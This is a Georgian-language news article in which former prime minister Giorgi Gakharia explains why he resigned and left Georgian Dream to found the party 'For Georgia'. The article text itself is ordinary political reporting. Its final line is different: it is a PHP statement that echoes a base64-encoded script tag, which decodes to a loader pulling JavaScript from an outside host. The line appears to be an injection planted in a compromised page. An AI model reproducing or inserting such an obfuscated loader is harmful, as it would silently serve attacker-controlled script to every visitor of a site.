celsiusi
ავერსი საქკაბელი
პარტია „საქართველოსთვის“ თავმჯდომარე გიორგი გახარია პრემიერ-მინისტრის პოსტიდან გადადგომის და „ოცნების“ დატოვების სამ მიზეზს ასახელებს.
 
როგორც მან პარტიის პრეზენტაციაზე სიტყვით გამოსვლისას განაცხადა, მას არ ეშინია არაფერზე საუბრის, რაც გაუკეთებია და რაშიც მონაწილეობა მიუღია.
 
ყოფილი პრემიერი პირობას დებს, რომ ყველა კითხვას პასუხს გასცემს.
 
„ბოლო წლების განმავლობაში, სხვადასხვა მიმართულებით გარკვეული პროგრესი იყო, ამას ვაღიარებთ, მაგრამ ჩემთვის კატეგორიულად მიუღებელია, როდესაც ამ პროგრესის შედარება ხდება წარსულთან. ჩვენ აღარ გვაკმაყოფილებს დღევანდელი მდგომარეობის შედარება წარსულთან, რადგან ეს ქვეყანას მომავალს უსპობს. ყველანი უნდა შევთანხმდეთ, რომ იმის მაგივრად, რომ ჩვენი დღევანდელობა შევადაროთ ცუდ წარსულს, ჩვენ უნდა დავისახოთ უაღრესად ამბიციური მიზნები, რომლებიც მიმართული იქნება საუკეთესო მომავლისკენ.
 
არსებობს უამრავი კითხვა საზოგადოებაში, რატომ ვართ დღეს აქ და რატომ ვაფუძნებთ პოლიტიკურ პარტიას. მე ვიყავი ამ პოლიტიკური გუნდის ნაწილი, მაგრამ მე გადავდექი დაკავებული თანამდებობიდან. გადავდექი სწორედ იმიტომ, რომ პარტია დაშორდა ჩვენი მოქალაქეების რეალურ პრობლემებს მარტივი მიზეზის გამო - რატომღაც ჩაითვალა, რომ პოლიტიკურ ოპონენტებთან ბრძოლა ბევრად მნიშვნელოვანი თემაა, ვიდრე ჩვენი მოქალაქეების ყოველდღიურ პრობლემებზე ზრუნვა.
 
გადავდექი იმიტომ, რომ 8-წლიანი მმართველობის შემდგომ მმართველი პარტია თავის თუნდაც ყველაზე დიდ მიღწევებს ადარებდა 10-15 წლის წინანდელ რეალობას და ამით განვითარების პერსპექტივას უკლავდა ქვეყანას. არავის უარყოფს იმას, რომ დღევანდელი სასამართლოს სისტემა არის უკეთესი ვიდრე იყო 15 წლის წინ, რა თქმა უნდა, ეს ფაქტია, მაგრამ ეს არ უარყოფს იმას, რომ ჩვენი სასამართლო სისტემა უნდა იყოს უფრო სამართლიანი, ეფექტიანი და კიდევ უფრო მაღალი მიზნები დაისახოს. ეს არის სისტემური განსხვავება, რატომაც მე დღეს აქ ვდგავარ.
 
გადავდექი იმიტომ, რომ ერთ კონკრეტულ მომენტში, პოლიტიკურმა პარტიამ პარტიული ინტერესების სახელმწიფო ინტერესებზე მაღლა დააყენა. ეს იყო რეალური მიზეზები იმ ნაბიჯის, რომელიც მე გადავდგი“, - განაცხადა ყოფილმა პრემიერმა.
 
გიორგი გახარიას აზრით, სისტემური განახლების გზით უნდა გაგრძელდეს პოზტიური რეფორმები, რომელიც დაწყებულია, მაგრამ ამბიციური მიზნების და გეგმების დასახვას არ უნდა შევუშინდეთ.
1157
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");